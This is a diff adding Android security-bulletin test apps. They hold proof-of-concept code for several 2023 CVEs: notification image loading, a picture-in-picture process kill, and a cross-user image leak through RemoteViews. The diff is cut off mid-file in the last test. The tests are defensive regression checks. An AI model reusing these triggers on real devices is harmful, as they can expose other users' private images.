+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21144",
+    defaults: [
+        "cts_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+    ],
+    platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/AndroidManifest.xml
new file mode 100644
index 0000000..c0b27b7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21144">
+
+    <uses-permission android:name="android.permission.EXPAND_STATUS_BAR" />
+    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+
+    <application>
+        <service android:name=".PocListenerService"
+            android:exported="true"
+            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
+            <intent-filter>
+                <action android:name="android.service.notification.NotificationListenerService" />
+            </intent-filter>
+        </service>
+    </application>
+
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21144" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/res/values/strings.xml
new file mode 100644
index 0000000..d51c9b9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/res/values/strings.xml
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<resources>
+    <string name="broadcastAction">CVE_2023_21144_action</string>
+    <string name="dataMimeType">image/png</string>
+    <string name="failMessage">Device is vulnerable to b/252766417 !!</string>
+    <string name="fileNotCreated">image file is not created</string>
+    <string name="imageFile">cve_2023_21144.png</string>
+    <string name="message">CVE_2023_21144_message</string>
+    <string name="notificationChannelId">CVE_2023_21144_notification_channel_id</string>
+    <string name="notificationChannelName">CVE_2023_21144_notification_channel_name</string>
+    <string name="notificationListenerNotConnected">notification listener not connected!!</string>
+    <string name="notificationText">CVE_2023_21144_notification_text</string>
+    <string name="resourceId">android:id/message_text</string>
+    <string name="systemUiPkgName">com.android.systemui</string>
+    <string name="username">CVE_2023_21144_username</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/DeviceTest.java
new file mode 100644
index 0000000..e91c3ea
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/DeviceTest.java
@@ -0,0 +1,197 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21144;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.Notification.MessagingStyle;
+import android.app.Notification.MessagingStyle.Message;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.Person;
+import android.app.StatusBarManager;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.graphics.Bitmap;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.Environment;
+import android.os.Handler;
+import android.os.HandlerThread;
+import android.widget.ImageView;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.File;
+import java.io.FileOutputStream;
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    @Test
+    public void testPocCVE_2023_21144() {
+        try {
+            Instrumentation instrumentation = getInstrumentation();
+            Context context = instrumentation.getContext();
+
+            try (AutoCloseable withTemporaryImage = withTemporaryImage(context)) {
+                // Prepare notification channel
+                NotificationChannel notificationChannel =
+                        new NotificationChannel(
+                                context.getString(R.string.notificationChannelId),
+                                context.getString(R.string.notificationChannelName),
+                                NotificationManager.IMPORTANCE_HIGH);
+                NotificationManager notificationManager =
+                        context.getSystemService(NotificationManager.class);
+                notificationManager.createNotificationChannel(notificationChannel);
+
+                // Prepare messaging style
+                Person person =
+                        new Person.Builder().setName(context.getString(R.string.username)).build();
+                Message message =
+                        new Message(context.getString(R.string.message), 0L /* timestamp */, person)
+                                .setData(
+                                        context.getString(R.string.dataMimeType),
+                                        Uri.fromFile(getImageFile(context)));
+                MessagingStyle messagingStyle = new MessagingStyle(person).addMessage(message);
+
+                // Build notification
+                Notification notification =
+                        new Notification.Builder(context, notificationChannel.getId())
+                                .setContentText(context.getString(R.string.notificationText))
+                                .setSmallIcon(
+                                        Icon.createWithData(
+                                                new byte[0] /* data */,
+                                                0 /* offset */,
+                                                0 /* length */))
+                                .setStyle(messagingStyle)
+                                .build();
+
+                // Register BroadcastReceiver
+                Semaphore broadcastReceived = new Semaphore(0);
+                BroadcastReceiver broadcastReceiver =
+                        new BroadcastReceiver() {
+                            @Override
+                            public void onReceive(Context context, Intent intent) {
+                                try {
+                                    broadcastReceived.release();
+                                } catch (Exception ignore) {
+                                    // Ignore
+                                }
+                            }
+                        };
+                IntentFilter broadcastFilter =
+                        new IntentFilter(context.getString(R.string.broadcastAction));
+                context.registerReceiver(broadcastReceiver, broadcastFilter);
+
+                // Send notification and wait for broadcast to get received
+                notificationManager.notify(0 /* notification id */, notification);
+                final long timeout = 10_000L;
+                assumeTrue(
+                        context.getString(R.string.notificationListenerNotConnected),
+                        broadcastReceived.tryAcquire(timeout, TimeUnit.MILLISECONDS));
+
+                // With fix, the notification does not contain image. Hence, using uiautomator
+                // to detect the imageview to fail test
+                context.getSystemService(StatusBarManager.class).expandNotificationsPanel();
+                final UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+                UiObject2 uiObject =
+                        uiDevice.wait(
+                                Until.findObject(
+                                        By.pkg(context.getString(R.string.systemUiPkgName))
+                                                .res(context.getString(R.string.resourceId))
+                                                .desc(context.getString(R.string.message))
+                                                .clazz(ImageView.class.getName())),
+                                timeout);
+                assertNull(context.getString(R.string.failMessage), uiObject);
+            }
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    private AutoCloseable withTemporaryImage(Context context) throws Exception {
+        // Create a png file in a worker Thread.
+        CompletableFuture<Boolean> imageIsReady = new CompletableFuture<Boolean>();
+        final HandlerThread handlerThread = new HandlerThread(context.getPackageName());
+        handlerThread.start();
+        new Handler(handlerThread.getLooper())
+                .post(
+                        () -> {
+                            try {
+                                // The dimension of 13000 x 17000 creates png image of size ~2mb
+                                // which is sufficient to extend loading time of 100ms.
+                                final int sufficientlyLargeWidth = 13000;
+                                final int sufficientlyLargeHeight = 17000;
+                                Bitmap bitmap =
+                                        Bitmap.createBitmap(
+                                                sufficientlyLargeWidth,
+                                                sufficientlyLargeHeight,
+                                                Bitmap.Config.ARGB_8888);
+                                File imageFile = getImageFile(context);
+                                imageFile.createNewFile();
+                                FileOutputStream fileOutputStream = new FileOutputStream(imageFile);
+                                bitmap.compress(
+                                        Bitmap.CompressFormat.PNG,
+                                        100 /* quality */,
+                                        fileOutputStream);
+                                fileOutputStream.flush();
+                                fileOutputStream.close();
+                                imageIsReady.complete(true);
+                            } catch (Exception ignore) {
+                                imageIsReady.complete(false);
+                            }
+                        });
+
+        // Wait until image gets created successfully
+        assumeTrue(
+                context.getString(R.string.fileNotCreated),
+                imageIsReady.get() && getImageFile(context).exists());
+
+        return () -> {
+            File imageFile = getImageFile(context);
+            if (imageFile.exists()) {
+                imageFile.delete();
+            }
+        };
+    }
+
+    private File getImageFile(Context context) {
+        return Environment.buildPath(
+                Environment.getExternalStorageDirectory(),
+                Environment.DIRECTORY_DOWNLOADS,
+                context.getString(R.string.imageFile));
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/PocListenerService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/PocListenerService.java
new file mode 100644
index 0000000..77508a6
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/PocListenerService.java
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21144;
+
+import android.content.Intent;
+import android.service.notification.NotificationListenerService;
+import android.service.notification.StatusBarNotification;
+
+public class PocListenerService extends NotificationListenerService {
+
+    @Override
+    public void onNotificationPosted(StatusBarNotification sbn) {
+        try {
+            // Send broadcast when notification is posted
+            sendBroadcast(new Intent(getString(R.string.broadcastAction)));
+        } catch (Exception ignore) {
+            // Ignore as it causes assumptionFailure in DeviceTest
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/Android.bp
new file mode 100644
index 0000000..bb5bd8a
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21145",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/AndroidManifest.xml
new file mode 100644
index 0000000..c0be6bd
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/AndroidManifest.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+          package="android.security.cts.CVE_2023_21145">
+
+    <application>
+        <activity
+            android:name=".PipActivity"
+            android:exported="true"
+            android:supportsPictureInPicture="true"
+            android:process=":pipActivity" />
+
+        <activity android:name=".PocActivity"
+            android:taskAffinity="taskAffinity.cve_2023_21145" />
+    </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PipActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PipActivity.java
new file mode 100644
index 0000000..65d2aff
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PipActivity.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts.CVE_2023_21145;
+
+import android.app.Activity;
+import android.app.PictureInPictureParams;
+import android.content.Intent;
+import android.os.Handler;
+import android.os.HandlerThread;
+import android.os.Process;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+public class PipActivity extends Activity {
+
+    @Override
+    protected void onResume() {
+        super.onResume();
+
+        // Start PocActivity
+        startActivity(new Intent(this, PocActivity.class).setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+        // Create HandlerThread and post the Runnable tasks
+        HandlerThread handlerThread = new HandlerThread(getPackageName());
+        handlerThread.start();
+        Handler handler = new Handler(handlerThread.getLooper());
+
+        // Enter into pip mode after 2000 ms delay
+        final long timeout = 2_000L;
+        handler.postDelayed(
+                () -> enterPictureInPictureMode(new PictureInPictureParams.Builder().build()),
+                timeout);
+
+        // Kill current process after 2000 ms delay of entering pip mode
+        Semaphore releaseOnResume = new Semaphore(0);
+        handler.postDelayed(
+                () -> {
+                    Process.killProcess(Process.myTid());
+                    releaseOnResume.release();
+                },
+                timeout * 2);
+
+        // To hold the process in onResume until the process dies.
+        try {
+            releaseOnResume.tryAcquire(10_000L /* timeout */, TimeUnit.MILLISECONDS);
+        } catch (InterruptedException ignore) {
+            // Ignore
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PocActivity.java
similarity index 80%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PocActivity.java
index 4416990..b160ee5 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PocActivity.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21145;
 
 import android.app.Activity;
 
-public class PocActivity extends Activity {
-}
+public class PocActivity extends Activity {}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/Android.bp
new file mode 100644
index 0000000..949556b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21238",
+    defaults: [
+        "cts_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/AndroidManifest.xml
new file mode 100644
index 0000000..6c0315e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21238">
+    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21238" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/res/layout/cve_2023_21238_layout.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/res/layout/cve_2023_21238_layout.xml
new file mode 100644
index 0000000..555c9f7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/res/layout/cve_2023_21238_layout.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<ImageView xmlns:android="http://schemas.android.com/apk/res/android"
+    android:id="@+id/cve_2023_21238_img"
+    android:layout_width="match_parent"
+    android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/src/android/security/cts/CVE_2023_21238/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/src/android/security/cts/CVE_2023_21238/DeviceTest.java
new file mode 100644
index 0000000..d8090d0
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/src/android/security/cts/CVE_2023_21238/DeviceTest.java
@@ -0,0 +1,144 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21238;
+
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    private AutoCloseable withAdoptShellPermissionIdentity(
+            UiAutomation uiAutomation, String permission) {
+        uiAutomation.adoptShellPermissionIdentity(permission);
+
+        // Remove permissions
+        return () -> uiAutomation.dropShellPermissionIdentity();
+    }
+
+    @Test
+    public void testPocCVE_2023_21238() {
+        UiDevice uiDevice = null;
+        try {
+            final String cveId = "cve_2023_21238_";
+            final String title = cveId + "title";
+
+            Instrumentation instrumentation = getInstrumentation();
+            Context context = instrumentation.getContext();
+            UiAutomation uiAutomation = instrumentation.getUiAutomation();
+            uiDevice = UiDevice.getInstance(instrumentation);
+            int userId = -1;
+
+            // Retrieve created user Id
+            try (AutoCloseable withAdoptShellPermissionIdentity =
+                    withAdoptShellPermissionIdentity(
+                            uiAutomation, android.Manifest.permission.CREATE_USERS)) {
+                final List<UserInfo> list = context.getSystemService(UserManager.class).getUsers();
+                for (UserInfo info : list) {
+                    if (info.name.contains(cveId)) {
+                        userId = info.id;
+                        break;
+                    }
+                }
+            }
+            assumeTrue(userId != -1);
+
+            // Post a notification with a content view containing image from other user
+            RemoteViews rvPortrait =
+                    new RemoteViews(context.getPackageName(), R.layout.cve_2023_21238_layout);
+            rvPortrait.setImageViewUri(
+                    R.id.cve_2023_21238_img,
+                    ContentProvider.maybeAddUserId(EXTERNAL_CONTENT_URI, userId));
+            NotificationChannel notificationChannel =
+                    new NotificationChannel(cveId, cveId, NotificationManager.IMPORTANCE_DEFAULT);
+            RemoteViews rvOuter = new RemoteViews(rvPortrait, rvPortrait);
+            NotificationManager notificationManager =
+                    context.getSystemService(NotificationManager.class);
+            notificationManager.createNotificationChannel(notificationChannel);
+            Notification notification =
+                    new Notification.Builder(context, cveId)
+                            .setContentTitle(title)
+                            .setSmallIcon(
+                                    Icon.createWithData(
+                                            new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+                            .setCustomContentView(rvOuter)
+                            .setCustomBigContentView(rvOuter)
+                            .build();
+            try {
+                notificationManager.notify(0 /* id */, notification);
+            } catch (SecurityException securityException) {
+                if (securityException
+                        .getLocalizedMessage()
+                        .toLowerCase()
+                        .contains(EXTERNAL_CONTENT_URI.toString())) {
+                    // Ignore exception thrown with fix and exit the test
+                    return;
+                } else {
+                    throw securityException;
+                }
+            }
+
+            // Open notification shade
+            assumeTrue("Opening notification shade unsuccessful", uiDevice.openNotification());
+
+            // Wait for notification to appear and detect if the remote view is present
+            uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */);
+            UiObject2 exposedImg =
+                    uiDevice.findObject(By.res(context.getPackageName(), cveId + "img"));
+            assertNull(
+                    "Device is vulnerable to b/277740848, Other user's images can be exposed in"
+                            + " notifications using remote views",
+                    exposedImg);
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                uiDevice.pressHome();
+            } catch (Exception e) {
+                // Ignore exceptions as the test has finished
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/Android.bp
new file mode 100644
index 0000000..4a33f83
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21239",
+    defaults: [
+        "cts_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "sts-device-util",
+    ],
+    platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/AndroidManifest.xml
new file mode 100644
index 0000000..b8fcfe3
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/AndroidManifest.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21239">
+
+    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+    <uses-permission android:name="android.permission.USE_FULL_SCREEN_INTENT" />
+
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21239" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/src/android/security/cts/CVE_2023_21239/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/src/android/security/cts/CVE_2023_21239/DeviceTest.java
new file mode 100644
index 0000000..f56a217
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/src/android/security/cts/CVE_2023_21239/DeviceTest.java
@@ -0,0 +1,185 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21239;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.PendingIntent;
+import android.app.Person;
+import android.app.UiAutomation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.Intent;
